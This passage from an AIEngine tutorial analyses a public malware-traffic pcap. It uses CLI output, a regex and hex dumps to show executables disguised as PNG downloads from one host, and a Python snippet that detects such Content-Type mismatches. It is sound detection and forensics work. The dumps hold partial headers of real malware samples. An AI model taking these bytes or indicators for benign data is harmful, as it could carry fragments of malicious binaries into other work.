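Because the learned pattern is a fixed prefix of the buffer (the -b option sets its length), it is a literal-match signature: it identifies this exact traffic well but will miss any variant whose first bytes differ, which is worth keeping in mind before deploying it as a rule.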

Malware analysis part 1

One of the benefits of using the engine is how easy it is to analyze malware just from its binary form. For this example we use the sample provided by the fantastic blog http://www.malware-traffic-analysis.net/ and illustrate how to detect the malware.

Without knowing anything about the sample we just run a deep analysis of the HTTP component of the pcap file. For clarity I have removed some of the output and replaced it with .... to keep the analysis short.

./aiengine -i /tmp/2016-07-07-traffic-analysis-exercise.pcap -P http -s 5
AIEngine running on Linux kernel 4.6.4-201.fc23.x86_64
    GCC version:5.3.1 Pcre version:8.39 Boost version:1.58
[07/07/16 19:20:45] Lan network stack ready.
[07/07/16 19:20:45] Processing packets from file /tmp/2016-07-07-traffic-analysis-exercise.pcap
[07/07/16 19:20:45] Stack 'Lan network stack' using 971 KBytes of memory
PacketDispatcher(0x1cc6890) statistics
    Connected to Lan network stack
    Total packets:                9130
    Total bytes:               6254270
HTTPProtocol(0x1cc7ab0) statistics
    Total allocated:        252 KBytes
    Total packets:                2963
    Total bytes:               3787977
    Total L7 bytes:            1982617
    Total validated packets:        80
    Total malformed packets:        23
    Total allow hosts:             123
    Total banned hosts:              0
    Total requests:                123
    Total responses:               116
    HTTP Methods
    Total gets:                    122
    Total posts:                     1
    Total heads:                     0
    Total connects:                  0
    Total options:                   0
    Total puts:                      0
    Total deletes:                   0
    Total traces:                    0
    Total others:                    3
    HTTP Responses
    ....
    Total found:                            41
    Total moved permanently:                 1
    Total multiple choices:                  0
    Total use proxy:                         0
    Total im used:                           0
    Total already reported:                  0
    Total no response:                       0
    Total multi-status:                      0
    Total partial content:                   0
    Total reset content:                     0
    Total network connect timeout error:     0
    Total no content:                       11
    Total network read timeout error:        0
    Total login timeout:                     0
    Total non-authoritative information:     0
    Total accepted:                          0
    Total created:                           0
    Total ok:                               62
    ....
FlowForwarder(0x1cd2b50) statistics
    Plugged to object(0x1cc7ab0)
    Total forward flows:             0
    Total received flows:           80
    Total fail flows:                0
HTTP Info Cache statistics
    Total items:                   695
    Total allocated:        102 KBytes
    Total current alloc:     92 KBytes
    Total acquires:                 80
    Total releases:                  7
    Total fails:                     0
Uri cache statistics
    Total items:                   646
    Total allocated:         30 KBytes
    Total current alloc:     25 KBytes
    Total acquires:                122
    Total releases:                  0
    Total fails:                     0
Host cache statistics
    Total items:                   715
    Total allocated:         30 KBytes
    Total current alloc:     27 KBytes
    Total acquires:                 53
    Total releases:                  0
    Total fails:                     0
UserAgent cache statistics
    Total items:                   764
    Total allocated:         30 KBytes
    Total current alloc:     29 KBytes
    Total acquires:                  4
    Total releases:                  0
    Total fails:                     0
ContentType cache statistics
    Total items:                   759
    Total allocated:         30 KBytes
    Total current alloc:     29 KBytes
    Total acquires:                  9
    Total releases:                  0
    Total fails:                     0
File cache statistics
    Total items:                   762
    Total allocated:         30 KBytes
    Total current alloc:     29 KBytes
    Total acquires:                  6
    Total releases:                  0
    Total fails:                     0
    HTTP Uris usage
            ....
            Uri:/passback/np/fef5cc810754ff8f0465298ac2146c16.js:1
            Uri:/pagead/js/lidar.js:1
            Uri:/orbserv/hbpix?pixId=5392&cckz=true:1
            Uri:/orbserv/hbpix?pixId=5392:1
            Uri:/ncsi.txt:1
            Uri:/match?excid=11&cijs=1:1
            Uri:/bh/rtset?do=add&pid=531399&ev=172e2h769t7pz:1
            ....
    HTTP Hosts usage
            ....
            Host:pixel.quantserve.com:3
            Host:tags.tagcade.com:2
            Host:match.adsrvr.org:2
            Host:serve.tagcade.com:2
            Host:idpix.media6degrees.com:2
            Host:sync.mathtag.com:2
            Host:cm.g.doubleclick.net:2
            Host:cm.adgrx.com:2
            Host:zt.1rx.io:1
            Host:track.eyeviewads.com:1
            Host:tr.contextweb.com:1
            ....
    HTTP UserAgents usage
            UserAgent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36:76
            UserAgent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0):2
            UserAgent:Microsoft NCSI:1
            UserAgent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko:1
    HTTP ContentTypes usage
            ContentType:application/javascript:1
            ContentType:application/x-javascript:1
            ContentType:application/x-www-form-urlencoded:1
            ContentType:image/gif:1
            ContentType:image/jpeg:1
            ContentType:image/png:1
            ContentType:text/html:1
            ContentType:text/javascript:1
            ContentType:text/plain:1
    HTTP Filenames usage
            Filename:572fe.png:1
            Filename:6b74e.png:1
            Filename:7302d.png:1
            Filename:7d424dc12a.png:1
            Filename:b648580daeed68.png:1
            Filename:f.txt:1
Exiting process

According to the output we have some png files and just one content type associated with these files.

Let's write a regular expression to find the connection that these file downloads/uploads belong to:

./aiengine -i /tmp/2016-07-07-traffic-analysis-exercise.pcap -R -r "^HTTP.*\.png" -m
AIEngine running on Linux kernel 4.6.4-201.fc23.x86_64
    GCC version:5.3.1 Pcre version:8.39 Boost version:1.58
[07/07/16 19:23:10] Lan network stack ready.
[07/07/16 19:23:10] Enable NIDSEngine on Lan network stack
[07/07/16 19:23:10] Processing packets from file /tmp/2016-07-07-traffic-analysis-exercise.pcap
[07/27/16 15:23:10] Stack 'Lan network stack' using 971 KBytes of memory
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:5 matchs with (0x15d59c0)Regex [experimental0]
PacketDispatcher(0x1440bb0) statistics
    Connected to Lan network stack
    Total packets:                9130
    Total bytes:               6254270
RegexManager(0x15d58f0) statistics
    Regex:experimental0 matches:1

Exiting process

This shows that the conversation 172.16.1.126:49158:6:184.107.174.122:80 matches the provided regular expression. Let's see if that conversation has more downloads (-C parameter):

./aiengine -i /tmp/2016-07-07-traffic-analysis-exercise.pcap -R -r "^HTTP.*\.png" -m -C
AIEngine running on Linux kernel 4.6.4-201.fc23.x86_64
    GCC version:5.3.1 Pcre version:8.39 Boost version:1.58
[07/07/16 19:23:18] Lan network stack ready.
[07/07/16 19:23:18] Enable NIDSEngine on Lan network stack
[07/07/16 19:23:18] Processing packets from file /tmp/2016-07-07-traffic-analysis-exercise.pcap
[07/27/16 15:23:18] Stack 'Lan network stack' using 971 KBytes of memory
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:5 matchs with (0x14b9ab0)Regex [experimental0]
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:378 matchs with (0x14b9ab0)Regex [experimental0]
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:581 matchs with (0x14b9ab0)Regex [experimental0]
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:643 matchs with (0x14b9ab0)Regex [experimental0]
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:2585 matchs with (0x14b9ab0)Regex [experimental0]
PacketDispatcher(0x1323150) statistics
    Connected to Lan network stack
    Total packets:                9130
    Total bytes:               6254270
RegexManager(0x14b99e0) statistics
    Regex:experimental0 matches:5

Exiting process

So according to the information shown, the conversation has 5 downloads of “something”. Let's dig into it:
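What the dump below makes visible by eye (a response declared as image/png whose body starts with an MZ/PE header) can be checked automatically. The following is an added example, not AIEngine code, that parses an HTTP response, compares the declared Content-Type with the magic bytes of the body and pulls the attachment filename. SAMPLE_RESPONSE is reconstructed from the header bytes visible in the dump with the body cut to its first 16 bytes; SAMPLE_PNG is a constructed well-formed counterpart.

```python
# Added example, not AIEngine code: Content-Type versus body magic bytes.
MAGIC = [  # (prefix, MIME type it implies)
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"%PDF-", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),
    (b"MZ", "application/x-dosexec"),
]


def split_response(raw):
    """Return (status line, {header: [values]}, body). Repeated headers keep every value."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP head")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower().decode("latin-1"), []) \
               .append(value.strip().decode("latin-1"))
    return lines[0].decode("latin-1"), headers, body


def sniff_body(body):
    for magic, mime in MAGIC:
        if body.startswith(magic):
            return mime
    return None


def attachment_filename(disposition):
    for param in disposition.split(";")[1:]:
        k, _, v = param.strip().partition("=")
        if k.lower() == "filename":
            return v.strip().strip('"')
    return None


def check_response(raw):
    """Flag a response whose body magic contradicts its declared Content-Type."""
    status, headers, body = split_response(raw)
    declared = headers.get("content-type", [""])[0].split(";")[0].strip().lower()
    sniffed = sniff_body(body)
    return {
        "status": status,
        "declared": declared,
        "sniffed": sniffed,
        "filename": attachment_filename(headers.get("content-disposition", [""])[0]),
        "mismatch": sniffed is not None and sniffed != declared,
    }


# Reconstructed from the header bytes shown in the dump; body truncated to 16 bytes.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Length: 270383\r\n"
    b"Content-Type: image/png\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"X-Powered-By: PHP/5.4.14\r\n"
    b"Content-Disposition: attachment; filename=572fe.png\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"Date: Wed, 06 Jul 2016 00:13:43 GMT\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
)

# Constructed: a PNG that really is a PNG.
SAMPLE_PNG = (b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n\r\n"
              b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR")

if __name__ == "__main__":
    for raw in (SAMPLE_RESPONSE, SAMPLE_PNG):
        print(check_response(raw))
```

Only the first bytes of the body are needed, which is exactly what the -M output shows, so the check can run on the first data segment of the response without buffering the whole download.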

./aiengine -i /tmp/2016-07-07-traffic-analysis-exercise.pcap -R -r "^HTTP.*\.png" -m -C -M
AIEngine running on Linux kernel 4.6.4-201.fc23.x86_64
    GCC version:5.3.1 Pcre version:8.39 Boost version:1.58
[07/07/16 19:23:26] Lan network stack ready.
[07/07/16 19:23:26] Enable NIDSEngine on Lan network stack
[07/07/16 19:23:26] Processing packets from file /tmp/2016-07-07-traffic-analysis-exercise.pcap
[07/27/16 15:23:26] Stack 'Lan network stack' using 971 KBytes of memory
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:5 matchs with (0x14b3be0)Regex [experimental0]
     48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d         HTTP/1.1 200 OK.
     0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a         .Content-Length:
     20 32 37 30 33 38 33 0d 0a 43 6f 6e 74 65 6e 74          270383..Content
     2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67         -Type: image/png
     0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73         ..Server: Micros
     6f 66 74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d 50         oft-IIS/7.5..X-P
     6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35         owered-By: PHP/5
     2e 34 2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44         .4.14..Content-D
     69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61         isposition: atta
     63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65         chment; filename
     3d 35 37 32 66 65 2e 70 6e 67 0d 0a 58 2d 50 6f         =572fe.png..X-Po
     77 65 72 65 64 2d 42 79 3a 20 41 53 50 2e 4e 45         wered-By: ASP.NE
     54 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36         T..Date: Wed, 06
     20 4a 75 6c 20 32 30 31 36 20 30 30 3a 31 33 3a          Jul 2016 00:13:
     34 33 20 47 4d 54 0d 0a 0d 0a 4d 5a 90 00 03 00         43 GMT....MZ....
     00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00         ................
     00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00         ..@.............
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4         ................
     09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f         ..!..L.!This pro
     67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72         gram cannot be r
     75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d         un in DOS mode..
     0d 0a 24 00 00 00 00 00 00 00 7d e6 a3 d9 39 87         ..$.......}...9.
     cd 8a 39 87 cd 8a 39 87 cd 8a ba 9b c3 8a 38 87         ..9...9.......8.
     cd 8a 50 98 c4 8a 3f 87 cd 8a d0 98 c0 8a 38 87         ..P...?.......8.
     cd 8a 52 69 63 68 39 87 cd 8a 00 00 00 00 00 00         ..Rich9.........
     00 00 50 45 00 00 4c 01 03 00 f4 03 7c 57 00 00         ..PE..L.....|W..
     00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 70         ...............p
     00 00 00 40 00 00 00 00 00 00 38 14 00 00 00 10         ...@......8.....
     00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 10         ........@.......
     00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00         ................
     00 00 00 c0 00 00 00 10 00 00 22 c5 00 00 02 00         ..........".....
     00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10         ................
     00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00         ................
     00 00 24 78 00 00 28 00 00 00 00 90 00 00 20 2a         ..$x..(....... *
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 28 02 00 00 20 00 00 00 00 10 00 00 68 01         ..(... .......h.
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00         ...........text.
     00 00 c4 6e 00 00 00 10 00 00 00 70 00 00 00 10         ...n.......p....
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00         .............. .
     00 60 2e 64 61 74 61 00 00 00 bc 0c 00 00 00 80         .`.data.........
     00 00 00 10 00 00 00 80 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00         ......@....rsrc.
     00 00 20 2a 00 00 00 90 00 00 00 30 00 00 00 90         .. *.......0....
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00         ..............@.
     00 40 6c da 5b 4a 10 00 00 00 00 00 00 00 00 00         .@l.[J..........
     00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00         ..MSVBVM60.DLL..
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00                                             ...
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:378 matchs with (0x14b3be0)Regex [experimental0]
     48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d         HTTP/1.1 200 OK.
     0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a         .Content-Length:
     20 31 34 37 34 35 36 0d 0a 43 6f 6e 74 65 6e 74          147456..Content
     2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67         -Type: image/png
     0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73         ..Server: Micros
     6f 66 74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d 50         oft-IIS/7.5..X-P
     6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35         owered-By: PHP/5
     2e 34 2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44         .4.14..Content-D
     69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61         isposition: atta
     63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65         chment; filename
     3d 37 64 34 32 34 64 63 31 32 61 2e 70 6e 67 0d         =7d424dc12a.png.
     0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 41         .X-Powered-By: A
     53 50 2e 4e 45 54 0d 0a 44 61 74 65 3a 20 57 65         SP.NET..Date: We
     64 2c 20 30 36 20 4a 75 6c 20 32 30 31 36 20 30         d, 06 Jul 2016 0
     30 3a 31 33 3a 34 33 20 47 4d 54 0d 0a 0d 0a 4d         0:13:43 GMT....M
     5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8         Z...............
     00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00         .......@........
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e         ................
     1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69         .......!..L.!Thi
     73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74         s program cannot
     20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d          be run in DOS m
     6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9         ode....$........
     be 53 a4 ed df 3d f7 ed df 3d f7 ed df 3d f7 69         .S...=...=...=.i
     d3 5d f7 20 df 3d f7 82 c0 36 f7 33 df 3d f7 05         .]. .=...6.3.=..
     c0 39 f7 4b df 3d f7 7a fc 78 f7 c7 df 3d f7 cd         .9.K.=.z.x...=..
     a6 46 f7 5a df 3d f7 12 ff 38 f7 0b df 3d f7 ed         .F.Z.=...8...=..
     df 3c f7 de df 3d f7 f8 d2 62 f7 af df 3d f7 e8         .<...=...b...=..
     d3 61 f7 55 df 3d f7 52 69 63 68 ed df 3d f7 00         .a.U.=.Rich..=..
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3d         .......PE..L...=
     db 31 57 00 be 00 00 00 00 00 00 e0 00 0f 01 0b         .1W.............
     01 06 00 00 70 00 10 00 c0 01 00 00 00 00 00 60         ....p..........`
     70 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00         p............@..
     10 00 00 00 10 00 00 04 00 00 00 00 00 90 00 04         ................
     00 00 00 00 00 00 00 00 40 02 00 00 10 00 00 00         ........@.......
     00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00         ................
     00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00         ................
     00 00 00 00 00 00 00 60 87 00 00 8c 00 00 00 00         .......`........
     a0 00 00 28 98 01 00 00 00 00 00 00 00 00 00 00         ...(............
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     80 00 00 7c 02 00 00 00 0a 00 00 55 00 00 00 00         ...|.......U....
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e         ................
     74 65 78 74 00 00 00 80 63 00 00 00 10 00 00 00         text....c.......
     70 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00         p...............
     00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ec         ... ..`.rdata...
     0d 00 00 00 80 00 00 00 10 00 00 00 80 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e         ...........@..@.
     64 61 74 61 00 00 00 14 01 00 00 00 90 00 00 00         data............
     10 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28         ...@....rsrc...(
     98 01 00 00 a0 00 00 00 a0 01 00 00 a0 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00         ...........@..@.
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00                                             ...
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:581 matchs with (0x14b3be0)Regex [experimental0]
     48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d         HTTP/1.1 200 OK.
     0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a         .Content-Length:
     20 34 35 30 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d          45056..Content-
     54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d         Type: image/png.
     0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f         .Server: Microso
     66 74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d 50 6f         ft-IIS/7.5..X-Po
     77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e         wered-By: PHP/5.
     34 2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69         4.14..Content-Di
     73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63         sposition: attac
     68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d         hment; filename=
     62 36 34 38 35 38 30 64 61 65 65 64 36 38 2e 70         b648580daeed68.p
     6e 67 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79         ng..X-Powered-By
     3a 20 41 53 50 2e 4e 45 54 0d 0a 44 61 74 65 3a         : ASP.NET..Date:
     20 57 65 64 2c 20 30 36 20 4a 75 6c 20 32 30 31          Wed, 06 Jul 201
     36 20 30 30 3a 31 33 3a 34 34 20 47 4d 54 0d 0a         6 00:13:44 GMT..
     0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff         ..MZ............
     00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00         ..........@.....
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00         ................
     00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21         ..........!..L.!
     54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e         This program can
     6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f         not be run in DO
     53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00         S mode....$.....
     00 00 98 b3 ad 85 dc d2 c3 d6 dc d2 c3 d6 dc d2         ................
     c3 d6 a7 ce cf d6 db d2 c3 d6 5f ce cd d6 dd d2         .........._.....
     c3 d6 5f da 9e d6 da d2 c3 d6 dc d2 c2 d6 71 d2         .._...........q.
     c3 d6 34 cd c9 d6 d3 d2 c3 d6 64 d4 c5 d6 dd d2         ..4.......d.....
     c3 d6 34 cd c7 d6 da d2 c3 d6 52 69 63 68 dc d2         ..4.......Rich..
     c3 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01         ..........PE..L.
     04 00 39 47 9b 48 00 00 00 00 00 00 00 00 e0 00         ..9G.H..........
     0f 01 0b 01 06 00 00 60 00 00 00 60 00 00 00 00         .......`...`....
     00 00 70 6a 00 00 00 10 00 00 00 70 00 00 00 00         ..pj.......p....
     40 00 00 10 00 00 00 10 00 00 04 00 00 00 04 00         @...............
     00 00 04 00 00 00 00 00 00 00 00 d0 00 00 00 10         ................
     00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10         ................
     00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00         ................
     00 00 30 82 00 00 e4 04 00 00 68 74 00 00 78 00         ..0.......ht..x.
     00 00 00 c0 00 00 08 04 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 00 70 00 00 c0 02 00 00 00 00 00 00 00 00         ...p............
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
     00 00 2e 74 65 78 74 00 00 00 b0 5b 00 00 00 10         ...text....[....
     00 00 00 60 00 00 00 10 00 00 00 00 00 00 00 00         ...`............
